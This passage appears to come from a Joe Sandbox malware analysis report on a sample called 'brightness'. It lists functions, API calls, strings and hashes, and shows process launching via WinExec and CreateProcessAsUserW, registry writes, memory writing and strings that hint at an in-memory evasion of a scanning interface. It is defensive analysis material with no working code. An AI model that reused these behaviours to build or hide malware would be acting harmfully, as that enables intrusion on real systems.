Instruction ID: b3ec585742d48765e4ecf972141b693450aba9950bed6a5983af5954ca526c93
Opcode Fuzzy Hash: 2e49418a818ffe17aa24abccc8b4ab0ed3f7d93e83e532d1073caf0d7b365b26
Instruction Fuzzy Hash: 34F0625954C385BAE201E67C8C45F4BBFCD4B92224F048E5DB1E8DA2D2EA79D1048BB7

Function 02831A8C Relevance: 7.7, APIs: 6, Instructions: 175
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32(00000000,?,?,00000000,02831FE4), ref: 02831B17
Sleep.KERNEL32(0000000A,00000000,?,?,00000000,02831FE4), ref: 02831B31

Memory Dump Source

Source File: 00000008.00000002.2214187643.0000000002831000.00000020.00001000.00020000.00000000.sdmp, Offset: 02830000, based on PE: true

Associated: 00000008.00000002.2214169554.0000000002830000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2214280552.000000000285E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2214395996.0000000002892000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2214441547.0000000002986000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2214441547.0000000002989000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2830000_brightness.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 64c27c51a86103a7e8bde44c1acb7456e214cc24592ac7211ef1c6d0ae3ccfb3
Instruction ID: ae99671aacbed103433a848ab84d6003e10bd25d5fc554bcbb017defa1d93a3b
Opcode Fuzzy Hash: 64c27c51a86103a7e8bde44c1acb7456e214cc24592ac7211ef1c6d0ae3ccfb3
Instruction Fuzzy Hash: A451E07D6012408FEB16DF6CD988796BBD0AB45B18F2885AED54CCB2C6E770C445CBE1

Function 0284E72A Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 112
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InternetCheckConnectionA.WININET(00000000,00000001,00000000), ref: 0284E86A

Strings

OpenSession, xrefs: 0284E80C
Initialize, xrefs: 0284E75A
ScanBuffer, xrefs: 0284E7B3

Memory Dump Source

Source File: 00000008.00000002.2214187643.0000000002831000.00000020.00001000.00020000.00000000.sdmp, Offset: 02830000, based on PE: true

Associated: 00000008.00000002.2214169554.0000000002830000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2214280552.000000000285E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2214395996.0000000002892000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2214441547.0000000002986000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2214441547.0000000002989000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2830000_brightness.jbxd

Similarity

API ID: CheckConnectionInternet
String ID: Initialize$OpenSession$ScanBuffer
API String ID: 3847983778-3852638603
Opcode ID: 2978ce8d4283acfc2c0dfc19d351198521f0fa1b127e1984a9fa4a8de06c4e66
Instruction ID: 27c0ea0b4d9eaaeaf909c6161d3fb6e519f4b88c7e6d6cba2a610e3255b1ce5f
Opcode Fuzzy Hash: 2978ce8d4283acfc2c0dfc19d351198521f0fa1b127e1984a9fa4a8de06c4e66
Instruction Fuzzy Hash: F6410B7DA1020C9FEB12EBA8D880A9EB7FAFF98710F214461E401E7251DE74AD058F52

Function 0284881C Relevance: 6.1, APIs: 4, Instructions: 65
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNEL32(00000000,00000000,02848903), ref: 02848850
GetModuleHandleA.KERNEL32(00000000,00000000,00000000,02848903), ref: 02848860
GetProcAddress.KERNEL32(74AD0000,00000000), ref: 02848879

Part of subcall function 02847CF8: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02847D6C

FreeLibrary.KERNEL32(74AD0000,00000000,02892388,Function_000065D8,00000004,02892398,02892388,000186A3,00000040,0289239C,74AD0000,00000000,00000000,00000000,00000000,02848903), ref: 028488E3

Memory Dump Source

Source File: 00000008.00000002.2214187643.0000000002831000.00000020.00001000.00020000.00000000.sdmp, Offset: 02830000, based on PE: true

Associated: 00000008.00000002.2214169554.0000000002830000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2214280552.000000000285E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2214395996.0000000002892000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2214441547.0000000002986000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2214441547.0000000002989000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2830000_brightness.jbxd

Similarity

API ID: Library$AddressFreeHandleLoadMemoryModuleProcVirtualWrite
String ID:
API String ID: 1543721669-0
Opcode ID: 1aec669e57eca8748f84c2f68c5121a3138221a6b2983cca53a4e045c472d0cb
Instruction ID: de25ade9ce1ec483caeac776a2628a3c226948aef2e6d2925e8f36c6781d5f03
Opcode Fuzzy Hash: 1aec669e57eca8748f84c2f68c5121a3138221a6b2983cca53a4e045c472d0cb
Instruction Fuzzy Hash: 8411547DB40718BBEB01FBBCCC01A1E77A9EB45700F5404647A04EB7A4EA7499105B96

Function 028485D4 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 62processCOMMON

Download Yara Rule

APIs

Part of subcall function 02848018: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02848088,?,?,00000000,?,028479FE,ntdll,00000000,00000000,02847A43,?,?,00000000), ref: 02848056
Part of subcall function 02848018: GetModuleHandleA.KERNELBASE(?), ref: 0284806A

Part of subcall function 028480C0: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02848148,?,?,00000000,00000000,?,02848061,00000000,KernelBASE,00000000,00000000,02848088), ref: 0284810D
Part of subcall function 028480C0: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02848113
Part of subcall function 028480C0: GetProcAddress.KERNEL32(?,?), ref: 02848125

CreateProcessAsUserW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,Kernel32,00000000,00000000,00000000), ref: 02848660

Strings

Kernel32, xrefs: 0284861F
CreateProcessAsUserW, xrefs: 028485ED

Memory Dump Source

Source File: 00000008.00000002.2214187643.0000000002831000.00000020.00001000.00020000.00000000.sdmp, Offset: 02830000, based on PE: true

Associated: 00000008.00000002.2214169554.0000000002830000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2214280552.000000000285E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2214395996.0000000002892000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2214441547.0000000002986000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2214441547.0000000002989000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2830000_brightness.jbxd

Similarity

API ID: HandleModule$AddressProc$CreateProcessUser
String ID: CreateProcessAsUserW$Kernel32
API String ID: 3130163322-2353454454
Opcode ID: 580a600497f886163973db13eaa204204c9d40583f1e6c562aa5face3f6190f7
Instruction ID: 48992ebdf1673c637915add68f18b07f49bf4919b8d41f258b9162eb08664049
Opcode Fuzzy Hash: 580a600497f886163973db13eaa204204c9d40583f1e6c562aa5face3f6190f7
Instruction Fuzzy Hash: 3D11D0BE640208BFEB81EEACDD41F9A37EDEB0C710F554450BA08D7251CA74E9109B65

Function 02848406 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 46processCOMMON

Download Yara Rule

APIs

Part of subcall function 02848018: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02848088,?,?,00000000,?,028479FE,ntdll,00000000,00000000,02847A43,?,?,00000000), ref: 02848056
Part of subcall function 02848018: GetModuleHandleA.KERNELBASE(?), ref: 0284806A

Part of subcall function 028480C0: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02848148,?,?,00000000,00000000,?,02848061,00000000,KernelBASE,00000000,00000000,02848088), ref: 0284810D
Part of subcall function 028480C0: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02848113
Part of subcall function 028480C0: GetProcAddress.KERNEL32(?,?), ref: 02848125

WinExec.KERNEL32(?,?), ref: 02848470

Strings

Kernel32, xrefs: 02848453
WinExec, xrefs: 02848421

Memory Dump Source

Source File: 00000008.00000002.2214187643.0000000002831000.00000020.00001000.00020000.00000000.sdmp, Offset: 02830000, based on PE: true

Associated: 00000008.00000002.2214169554.0000000002830000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2214280552.000000000285E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2214395996.0000000002892000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2214441547.0000000002986000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2214441547.0000000002989000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2830000_brightness.jbxd

Similarity

API ID: HandleModule$AddressProc$Exec
String ID: Kernel32$WinExec
API String ID: 2292790416-3609268280
Opcode ID: 6401d81ef572d7403be327aac5ffc3837ca37f4d95aa80fdc89b07a3f4bd0ee8
Instruction ID: 76605347603bb147379f6637517c27da1d3dbe7855fc9408c8e55b918b690df4
Opcode Fuzzy Hash: 6401d81ef572d7403be327aac5ffc3837ca37f4d95aa80fdc89b07a3f4bd0ee8
Instruction Fuzzy Hash: 5301A43D640208BFE711EFB8DC01F5A77EDE748710F95C860B900D7650DA79AD009A66

Function 02848408 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 45processCOMMON

Download Yara Rule

APIs

Part of subcall function 02848018: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02848088,?,?,00000000,?,028479FE,ntdll,00000000,00000000,02847A43,?,?,00000000), ref: 02848056
Part of subcall function 02848018: GetModuleHandleA.KERNELBASE(?), ref: 0284806A

Part of subcall function 028480C0: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02848148,?,?,00000000,00000000,?,02848061,00000000,KernelBASE,00000000,00000000,02848088), ref: 0284810D
Part of subcall function 028480C0: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02848113
Part of subcall function 028480C0: GetProcAddress.KERNEL32(?,?), ref: 02848125

WinExec.KERNEL32(?,?), ref: 02848470

Strings

Kernel32, xrefs: 02848453
WinExec, xrefs: 02848421

Memory Dump Source

Source File: 00000008.00000002.2214187643.0000000002831000.00000020.00001000.00020000.00000000.sdmp, Offset: 02830000, based on PE: true

Associated: 00000008.00000002.2214169554.0000000002830000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2214280552.000000000285E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2214395996.0000000002892000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2214441547.0000000002986000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2214441547.0000000002989000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2830000_brightness.jbxd

Similarity

API ID: HandleModule$AddressProc$Exec
String ID: Kernel32$WinExec
API String ID: 2292790416-3609268280
Opcode ID: f58b9cbf3c207f6b8dcf6ccd97a394fd4093aa38d8ca9334f69730e634d1c8c9
Instruction ID: 68b9339938bf9e48973f5d36437c97963e7b9c1a1bf42cfa0a5047acb8150903
Opcode Fuzzy Hash: f58b9cbf3c207f6b8dcf6ccd97a394fd4093aa38d8ca9334f69730e634d1c8c9
Instruction Fuzzy Hash: B2F0A43D640208BFE711EFB8DC01F5A77EDE748710F95C860B900D7650DA79A9009A66

Function 02845BAC Relevance: 4.6, APIs: 3, Instructions: 105fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,00000000,02845CF4,?,?,02843880,00000001), ref: 02845C08
GetLastError.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,00000000,02845CF4,?,?,02843880,00000001), ref: 02845C36

Part of subcall function 02837D10: CreateFileA.KERNEL32(00000000,00000000,00000000,00000000,00000003,00000080,00000000,?,?,02843880,02845C76,00000000,02845CF4,?,?,02843880), ref: 02837D5E

Part of subcall function 02837F18: GetFullPathNameA.KERNEL32(00000000,00000104,?,?,?,02843880,02845C91,00000000,02845CF4,?,?,02843880,00000001), ref: 02837F37

GetLastError.KERNEL32(00000000,02845CF4,?,?,02843880,00000001), ref: 02845C9B

Part of subcall function 0283A6F8: FormatMessageA.KERNEL32(00003200,00000000,?,00000000,?,00000100,00000000,?,0283C359,00000000,0283C3B3), ref: 0283A717

Memory Dump Source

Source File: 00000008.00000002.2214187643.0000000002831000.00000020.00001000.00020000.00000000.sdmp, Offset: 02830000, based on PE: true

Associated: 00000008.00000002.2214169554.0000000002830000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2214280552.000000000285E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2214395996.0000000002892000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2214441547.0000000002986000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2214441547.0000000002989000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2830000_brightness.jbxd

Similarity

API ID: CreateErrorFileLast$FormatFullMessageNamePath
String ID:
API String ID: 503785936-0
Opcode ID: 8a06baf255fdf626b7e31b8e271dd6884817b2f9f796a7da3f1e8fecc5e736b7
Instruction ID: f1099b8c1d672415c15e266a530bf3c0709d8e7ace0780f0eb8a5d32dfa6b17b
Opcode Fuzzy Hash: 8a06baf255fdf626b7e31b8e271dd6884817b2f9f796a7da3f1e8fecc5e736b7
Instruction Fuzzy Hash: D131627CA002089FEB01EFACC88179EB7F6AB48314F908465E504E7381DB795A058FE6

Function 0284EAF2 Relevance: 4.6, APIs: 3, Instructions: 59registryCOMMON

Download Yara Rule

APIs

RegOpenKeyA.ADVAPI32(?,00000000,02986914), ref: 0284EB38
RegSetValueExA.ADVAPI32(0000069C,00000000,00000000,00000001,00000000,0000001C,00000000,0284EBA3), ref: 0284EB70
RegCloseKey.ADVAPI32(0000069C,0000069C,00000000,00000000,00000001,00000000,0000001C,00000000,0284EBA3), ref: 0284EB7B

Memory Dump Source

Source File: 00000008.00000002.2214187643.0000000002831000.00000020.00001000.00020000.00000000.sdmp, Offset: 02830000, based on PE: true

Associated: 00000008.00000002.2214169554.0000000002830000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2214280552.000000000285E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2214395996.0000000002892000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2214441547.0000000002986000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2214441547.0000000002989000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2830000_brightness.jbxd

Similarity

API ID: CloseOpenValue
String ID:
API String ID: 779948276-0
Opcode ID: d8361dc91864f2afb02ab74feeb97cbcb4465299e1d424ca4c77d0af879db6af
Instruction ID: 2eb362b7289e71f95a1aff5e4bc62c9930915ebf049857d07089b090370367c6
Opcode Fuzzy Hash: d8361dc91864f2afb02ab74feeb97cbcb4465299e1d424ca4c77d0af879db6af
Instruction Fuzzy Hash: B7110D7D604208AFEB01EBACDC8196E77EDEB09710F504470B905DB260DA75DE418AA6

Function 0284EAF4 Relevance: 4.6, APIs: 3, Instructions: 58registryCOMMON

Download Yara Rule

APIs

RegOpenKeyA.ADVAPI32(?,00000000,02986914), ref: 0284EB38
RegSetValueExA.ADVAPI32(0000069C,00000000,00000000,00000001,00000000,0000001C,00000000,0284EBA3), ref: 0284EB70
RegCloseKey.ADVAPI32(0000069C,0000069C,00000000,00000000,00000001,00000000,0000001C,00000000,0284EBA3), ref: 0284EB7B

Memory Dump Source

Source File: 00000008.00000002.2214187643.0000000002831000.00000020.00001000.00020000.00000000.sdmp, Offset: 02830000, based on PE: true

Associated: 00000008.00000002.2214169554.0000000002830000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2214280552.000000000285E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2214395996.0000000002892000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2214441547.0000000002986000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2214441547.0000000002989000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2830000_brightness.jbxd

Similarity

API ID: CloseOpenValue
String ID:
API String ID: 779948276-0
Opcode ID: fd58fd3fd556b69432a1759f5842396f7a236132da8b6192c7a5dccd5bef2fe8
Instruction ID: 2814167d3058140da3625fa32c50bb850169bb13051f2bcb7b0cbf1c668a6aec
Opcode Fuzzy Hash: fd58fd3fd556b69432a1759f5842396f7a236132da8b6192c7a5dccd5bef2fe8
Instruction Fuzzy Hash: CE111F7D604208AFEB01EBACDC81D6E77EDEB09710F504470B905DB260DB75DA418BA6

Function 0283E2E4 Relevance: 4.5, APIs: 3, Instructions: 45COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32(?), ref: 0283E2F3

Memory Dump Source

Source File: 00000008.00000002.2214187643.0000000002831000.00000020.00001000.00020000.00000000.sdmp, Offset: 02830000, based on PE: true

Associated: 00000008.00000002.2214169554.0000000002830000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2214280552.000000000285E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2214395996.0000000002892000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2214441547.0000000002986000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2214441547.0000000002989000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2830000_brightness.jbxd

Similarity

API ID: ClearVariant
String ID:
API String ID: 1473721057-0
Opcode ID: e0cd87ec89413b64a158ebff12bfc171d8f972f42324541c666d1779106c7c07
Instruction ID: 14fd749923e22078eecee00f426fc1fde5e9a12f3a23bcef60b2bd1a77bb4986
Opcode Fuzzy Hash: e0cd87ec89413b64a158ebff12bfc171d8f972f42324541c666d1779106c7c07
Instruction Fuzzy Hash: AAF0622D708218D7DB277B3CC9C456D279A5F4471575C5426B80AEB245CB389C15CBE3

Function 02834CFC Relevance: 4.5, APIs: 3, Instructions: 24memoryCOMMON

Download Yara Rule

APIs

SysFreeString.OLEAUT32(0284ED84), ref: 02834C1A
SysAllocStringLen.OLEAUT32(?,?), ref: 02834D07
SysFreeString.OLEAUT32(00000000), ref: 02834D19

Memory Dump Source

Source File: 00000008.00000002.2214187643.0000000002831000.00000020.00001000.00020000.00000000.sdmp, Offset: 02830000, based on PE: true

Associated: 00000008.00000002.2214169554.0000000002830000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2214280552.000000000285E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2214395996.0000000002892000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2214441547.0000000002986000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2214441547.0000000002989000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2830000_brightness.jbxd

Similarity

API ID: String$Free$Alloc
String ID:
API String ID: 986138563-0
Opcode ID: 5a5438c59bf50d5a9d2d1f0a3350fd82e771d5cb0ff699e6fe957ce0256f5644
Instruction ID: 4713543cb9e4b97ba717eaca0cc410e43dad1d11f0618a8b8332651fdc03db16
Opcode Fuzzy Hash: 5a5438c59bf50d5a9d2d1f0a3350fd82e771d5cb0ff699e6fe957ce0256f5644
Instruction Fuzzy Hash: 69E0C2BC1012015EFF076F209C04B37332ABFC1B01B144499E808CA010DB78C801ADF4

Function 0284705C Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 256COMMON

Download Yara Rule

APIs

SysFreeString.OLEAUT32(?), ref: 0284735A

Strings

H, xrefs: 02847111

Memory Dump Source

Source File: 00000008.00000002.2214187643.0000000002831000.00000020.00001000.00020000.00000000.sdmp, Offset: 02830000, based on PE: true

Associated: 00000008.00000002.2214169554.0000000002830000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2214280552.000000000285E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2214395996.0000000002892000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2214441547.0000000002986000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2214441547.0000000002989000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2830000_brightness.jbxd

Similarity

API ID: FreeString
String ID: H
API String ID: 3341692771-2852464175
Opcode ID: 8586e7d651284ffadad194d717bde8e7facba907c47c41173bdf0bb452e46eeb
Instruction ID: a9f3b27830c70a69970db58ae8590bbb68dc859072d2cb16b36ee29ba9d5f5ff
Opcode Fuzzy Hash: 8586e7d651284ffadad194d717bde8e7facba907c47c41173bdf0bb452e46eeb
Instruction Fuzzy Hash: 0AB1D078A016189FDB11CF99D880A9DFBF6FF49314F248569E809EB360DB30A845CF90

Function 0283E6E0 Relevance: 3.1, APIs: 2, Instructions: 63COMMON

Download Yara Rule

APIs

VariantCopy.OLEAUT32(00000000,00000000), ref: 0283E701

Part of subcall function 0283E2E4: VariantClear.OLEAUT32(?), ref: 0283E2F3

Memory Dump Source

Source File: 00000008.00000002.2214187643.0000000002831000.00000020.00001000.00020000.00000000.sdmp, Offset: 02830000, based on PE: true

Associated: 00000008.00000002.2214169554.0000000002830000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2214280552.000000000285E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2214395996.0000000002892000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2214441547.0000000002986000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2214441547.0000000002989000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2830000_brightness.jbxd

Similarity

API ID: Variant$ClearCopy
String ID:
API String ID: 274517740-0
Opcode ID: 900a6423fd52343485763f34000b2c760cc819c7e49d8b2b28550a0b255f892d
Instruction ID: 1f3135f6ba412d39677944d9990ab1701c7369bf16c01160c323629cd239e874
Opcode Fuzzy Hash: 900a6423fd52343485763f34000b2c760cc819c7e49d8b2b28550a0b255f892d
Instruction Fuzzy Hash: 7111A12C70421897CB33AF6DD8C4A6777D6AF857507045466EA4ECB25AEB30DC05CAE2

Function 0283E37C Relevance: 1.6, APIs: 1, Instructions: 96COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 0283E3BC

Memory Dump Source

Source File: 00000008.00000002.2214187643.0000000002831000.00000020.00001000.00020000.00000000.sdmp, Offset: 02830000, based on PE: true

Associated: 00000008.00000002.2214169554.0000000002830000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2214280552.000000000285E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2214395996.0000000002892000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2214441547.0000000002986000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2214441547.0000000002989000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2830000_brightness.jbxd

Similarity

API ID: InitVariant
String ID:
API String ID: 1927566239-0
Opcode ID: ac938681f277a9572a08ac2adef8efbbcf47ac50d86c03686dc24b340a6b5c6f
Instruction ID: 3f5ced19059492bfdec1e71c237857e65b678341579b241e827090135f4891c7
Opcode Fuzzy Hash: ac938681f277a9572a08ac2adef8efbbcf47ac50d86c03686dc24b340a6b5c6f
Instruction Fuzzy Hash: 39315E7DA00608ABDB12DFACC984AAA77E8FF0C314F484561F909D3640D334D991CBE2

Function 02846CEC Relevance: 1.5, APIs: 1, Instructions: 30COMMON

Download Yara Rule

APIs

CLSIDFromProgID.OLE32(00000000,?,00000000,02846D39,?,?,?,00000000), ref: 02846D19

Part of subcall function 02834C0C: SysFreeString.OLEAUT32(0284ED84), ref: 02834C1A

Memory Dump Source

Source File: 00000008.00000002.2214187643.0000000002831000.00000020.00001000.00020000.00000000.sdmp, Offset: 02830000, based on PE: true

Associated: 00000008.00000002.2214169554.0000000002830000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2214280552.000000000285E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2214395996.0000000002892000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2214441547.0000000002986000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2214441547.0000000002989000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2830000_brightness.jbxd

Similarity

API ID: FreeFromProgString
String ID:
API String ID: 4225568880-0
Opcode ID: 7235fd169fdd0a6e8bad162b2b92f0498cc2e713abf1da8a0a08fa3bb15d7ed5
Instruction ID: dc178f25a8edf6717bdb4d318712d14967275b1b304bff7727ec0eb48a65adfc
Opcode Fuzzy Hash: 7235fd169fdd0a6e8bad162b2b92f0498cc2e713abf1da8a0a08fa3bb15d7ed5
Instruction Fuzzy Hash: 64E06D7D604318BFF712EBA9CC52A5A77EDDB8AB10B510471A800D7601EA75BE0088A2

Function 02835814 Relevance: 1.5, APIs: 1, Instructions: 26COMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(02830000,?,00000105), ref: 02835832

Part of subcall function 02835A78: GetModuleFileNameA.KERNEL32(00000000,?,00000105,02830000,0285E790), ref: 02835A94
Part of subcall function 02835A78: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,02830000,0285E790), ref: 02835AB2
Part of subcall function 02835A78: RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,02830000,0285E790), ref: 02835AD0
Part of subcall function 02835A78: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 02835AEE
Part of subcall function 02835A78: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,00000000,02835B7D,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 02835B37
Part of subcall function 02835A78: RegQueryValueExA.ADVAPI32(?,02835CE4,00000000,00000000,?,?,?,?,00000000,00000000,?,?,00000000,02835B7D,?,80000001), ref: 02835B55
Part of subcall function 02835A78: RegCloseKey.ADVAPI32(?,02835B84,00000000,?,?,00000000,02835B7D,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 02835B77

Memory Dump Source

Source File: 00000008.00000002.2214187643.0000000002831000.00000020.00001000.00020000.00000000.sdmp, Offset: 02830000, based on PE: true

Associated: 00000008.00000002.2214169554.0000000002830000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2214280552.000000000285E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2214395996.0000000002892000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2214441547.0000000002986000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2214441547.0000000002989000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2830000_brightness.jbxd

Similarity

API ID: Open$FileModuleNameQueryValue$Close
String ID:
API String ID: 2796650324-0
Opcode ID: b28d12baadab1e4308946262d595483018c342fe3ea7939c094ad429c1d6dced
Instruction ID: 1e80a3bbc37518111bc2fc1a877ffae3138f4f0fc0566828a07790ec136ca274
Opcode Fuzzy Hash: b28d12baadab1e4308946262d595483018c342fe3ea7939c094ad429c1d6dced
Instruction Fuzzy Hash: BFE06DB9A002148BCB11DE5CC8C0A9737D8AB08B50F400565EC58DF34AD3B4D9208BD1

Function 02837D94 Relevance: 1.5, APIs: 1, Instructions: 23fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNEL32(?,?,?,?,00000000), ref: 02837DA8

Memory Dump Source

Source File: 00000008.00000002.2214187643.0000000002831000.00000020.00001000.00020000.00000000.sdmp, Offset: 02830000, based on PE: true

Associated: 00000008.00000002.2214169554.0000000002830000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2214280552.000000000285E000.00000004.00001000.00020000.00000000.sdmpDownload File
